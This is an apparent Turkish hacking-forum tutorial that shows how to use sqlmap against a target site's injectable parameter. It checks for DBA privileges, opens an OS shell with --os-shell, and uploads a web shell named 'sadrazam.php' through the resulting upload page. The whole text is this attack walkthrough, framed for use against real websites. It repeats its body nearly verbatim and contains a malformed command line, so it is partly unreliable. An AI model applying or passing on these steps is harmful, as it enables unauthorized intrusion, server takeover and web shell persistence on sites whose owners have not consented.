Normalde sqlmap.py -u http://www.orneksite.com/php?id=31 --dbs yaparak sorguyu başlatırdık
Ancak bu sefer --dbs komutu yerine,
--current-user --is-dba komutunu kullanacağız.
sqlmap.py -u http://www.orneksite.com/php?id=31 --current-user --is-dba
Taramaya basladı Smile
Tarama sonucunda çıkacak kodumuz:
current user is DBA : True
"False" yazısını görüyorsak işlem başarısız demektir.
Biz true yazısına göre devam edelim.
Simdi bir sonraki adıma geçiyoruz.
Kodumuz --os-shell
sqlmap -u sqlmap.py -u http://www.orneksite.com/php?id=31 --os-shell
Bu kodu yazdıktan sonra hedef sitenin dilini sorar.
Sqlmap bize aşağıda belirttiğim seçenekler verir;
1ASP
2PHP
3ASPX
4JSP
Şıkları deneyerek veya siteyi inceleyerek dili bulabilirsiniz diye düşünüyorum...
Şimdi örneğin 2 numaralı seçeneği seçtik ve php dedik...
Enterladıktan sonra info kısmı çıkar karşımıza.,o infoların arasında bir link olacak.
İnfo daki linki bulursanız link size bir upload yeri açacaktır.
Artık shellimizi upload edebiliriz.
Upload ettikten sonra linkteki .php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp enterlemeniz yeterlidir.
Mesela shellimiz sadrazam olsun.
Örneğin
Sitemizin adresi:
http://www.orneksite.com/events/...li/sadrazam.php
Şeklindedir.
Ancak bu sefer --dbs komutu yerine,
--current-user --is-dba komutunu kullanacağız.
sqlmap.py -u http://www.orneksite.com/php?id=31 --current-user --is-dba
Taramaya basladı Smile
Tarama sonucunda çıkacak kodumuz:
current user is DBA : True
"False" yazısını görüyorsak işlem başarısız demektir.
Biz true yazısına göre devam edelim.
Simdi bir sonraki adıma geçiyoruz.
Kodumuz --os-shell
sqlmap -u sqlmap.py -u http://www.orneksite.com/php?id=31 --os-shell
Bu kodu yazdıktan sonra hedef sitenin dilini sorar.
Sqlmap bize aşağıda belirttiğim seçenekler verir;
1ASP
2PHP
3ASPX
4JSP
Şıkları deneyerek veya siteyi inceleyerek dili bulabilirsiniz diye düşünüyorum...
Şimdi örneğin 2 numaralı seçeneği seçtik ve php dedik...
Enterladıktan sonra info kısmı çıkar karşımıza.,o infoların arasında bir link olacak.
İnfo daki linki bulursanız link size bir upload yeri açacaktır.
Artık shellimizi upload edebiliriz.
Upload ettikten sonra linkteki .php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp enterlemeniz yeterlidir.
Mesela shellimiz sadrazam olsun.
Örneğin
Sitemizin adresi:
http://www.orneksite.com/events/...li/sadrazam.php
Şeklindedir.
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
